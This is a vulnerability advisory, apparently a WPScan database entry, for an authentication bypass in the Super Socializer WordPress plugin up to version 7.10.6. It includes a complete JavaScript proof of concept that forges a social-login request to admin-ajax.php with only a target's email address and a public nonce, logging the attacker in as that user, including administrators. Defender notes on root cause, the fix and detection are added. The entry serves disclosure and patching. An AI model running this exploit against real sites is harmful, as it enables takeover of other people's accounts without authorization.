Super Socializer <= 7.10.6 - Authentication Bypass



Description
Any user account on the site can be logged into if the attacker knows that user's email address.
Proof of Concept
// Steps:
// Fill in these 3 variables
// NOTE(review): these three values are the only attacker-side inputs. The `security` value is a
// WordPress nonce readable from the public wp-login.php source (see below), i.e. a CSRF token
// available to any unauthenticated visitor — it provides no proof of identity. The defect described
// on this page is that the server accepts the client-supplied email as authenticated identity.
var url = 'http://my-site.com/wordpress/', //website url. Closing slash required
  email = 'john.doe@my-site.com', //The admin email address to exploit
  nonce = 'e86377d05a'; // View the source of the login page: http://my-site.com/wordpress/wp-login.php and search for `security`. copy here the nonce value Ex.: var the_champ_sl_ajax_token = {"ajax_url":"http:\/\/my-site.com\/wordpress\/wp-admin\/admin-ajax.php","security":"e86377d05a"};
// Click on Run in JsFiddle and then click on the Exploit button. It will open a window which first logs you in as the user with the given email address, then loads the admin area and you will be logged in.

/**
 * Proof of concept for the authentication bypass described above.
 *
 * Sends a single POST to `wp-admin/admin-ajax.php` with the plugin's social-login
 * AJAX action and a fabricated `profileData` record whose only meaningful field is
 * the victim's email. Everything else is a placeholder ('a'), which shows that the
 * vulnerable handler does not validate the social profile beyond the email —
 * presumably it never verifies a provider-issued token server-side (inferred from
 * the request shape; confirm against the plugin source / changeset referenced below).
 *
 * Defender notes:
 *  - Root cause: client-supplied identity (email) is trusted as authenticated identity.
 *  - Fix: update to 7.11 (see "fixed in version 7.11" and the trac changeset link below).
 *  - Detection: look for POSTs to admin-ajax.php with action=the_champ_user_auth whose
 *    profileData fields are placeholders or whose email belongs to a privileged user.
 *
 * Uses the module-level globals `url`, `email` and `nonce`.
 */
function exploit() {
  var param = {
    action: 'the_champ_user_auth',
    security: nonce,                  // WP nonce scraped from the public login page — CSRF token, not authentication
    'profileData[id]': 'a',
    'profileData[link]': 'a',
    'profileData[name]': 'a',
    'profileData[email]': email,      // the only field the server appears to key the login on
    'profileData[first_name]': 'a',
    'profileData[last_name]': 'a',
    provider: 'facebook',             // no provider token is sent; the handler apparently does not require one
    redirectionUrl: encodeURI(url)
  };
  OpenWindowWithPost(url + "wp-admin/admin-ajax.php",
    "width=700,height=345,left=100,top=100,resizable=yes,scrollbars=yes", "exploit", param);


  // Re-navigate the same named window to the admin area after a fixed delay. The 2 s wait is
  // not synchronised with the AJAX response; it only assumes the session cookie has been set by then.
  setTimeout(function() {
    window.open(url + "wp-admin/", 'exploit');
  }, 2000);
}

// Wire the PoC to every <button> on the page once the DOM is ready.
// Requires jQuery (`$`) to be present in the hosting page (the JsFiddle referenced above).
$(document).ready(function() {
  $('button').on('click', exploit);
});


/**
 * Submits `params` as an HTML form POST into a named browser window.
 *
 * A hidden <form> is built dynamically, targeted at `name`, submitted, and
 * removed again. The window is opened (empty) before the submit so that the
 * form's `target` resolves to that window with the given `windowoption`
 * features rather than to a browser-default popup.
 *
 * @param {string} url          form action (the URL that receives the POST)
 * @param {string} windowoption window.open feature string (size/position flags)
 * @param {string} name         window name, also used as the form's `target`
 * @param {Object} params       own enumerable key/value pairs become hidden inputs
 * @returns {Window|null}       the handle returned by window.open (null if blocked)
 */
function OpenWindowWithPost(url, windowoption, name, params) {
  var form = document.createElement("form");
  form.setAttribute("method", "post");
  form.setAttribute("action", url);
  form.setAttribute("target", name);

  // hasOwnProperty guard keeps inherited/prototype keys out of the POST body
  for (var i in params) {
    if (params.hasOwnProperty(i)) {
      var input = document.createElement('input');
      input.type = 'hidden';
      input.name = i;
      input.value = params[i];
      form.appendChild(input);
    }
  }

  // the form must be attached to the document for submit() to navigate
  document.body.appendChild(form);

  var wnd = window.open("", name, windowoption);

  form.submit();

  // the form is only a transport; drop it once the navigation has been started
  document.body.removeChild(form);

  return wnd;
}

Affects Plugin

Fixed in version 7.11

References

URL https://jsfiddle.net/5jh37uet/
URL https://plugins.trac.wordpress.org/changeset/1832860/super-socializer

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Views 1314
Verified No
WPVDB ID 9043

Timeline

Publicly Published 2018-03-03 (10 months ago)
Added 2018-03-15 (9 months ago)
Last Updated 2018-03-15 (9 months ago)
